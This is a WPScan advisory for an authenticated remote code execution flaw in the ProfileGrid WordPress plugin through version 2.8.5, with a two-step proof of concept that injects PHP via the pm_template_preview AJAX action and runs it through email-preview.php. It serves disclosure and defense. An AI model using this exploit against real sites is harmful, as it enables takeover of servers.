ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The plugin ProfileGrid – User Profiles, Groups and Communities versions prior to 2.8.6 is vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin. 
Proof of Concept
Send an authenticated POST request to wp-admin/admin-ajax.php with parameters action=pm_template_preview&html=<?php phpinfo();

Visit wp-content/plugins/profilegrid-user-profiles-groups-and-communities/admin/partials/email-preview.php

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/1877071/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Karim El Ouerghemmi
Submitter Website https://ripstech.com
Submitter Twitter ripstech
Views 78
Verified No
WPVDB ID 9086

Timeline

Publicly Published 2018-05-18 (6 days ago)
Added 2018-05-18 (5 days ago)
Last Updated 2018-05-18 (5 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.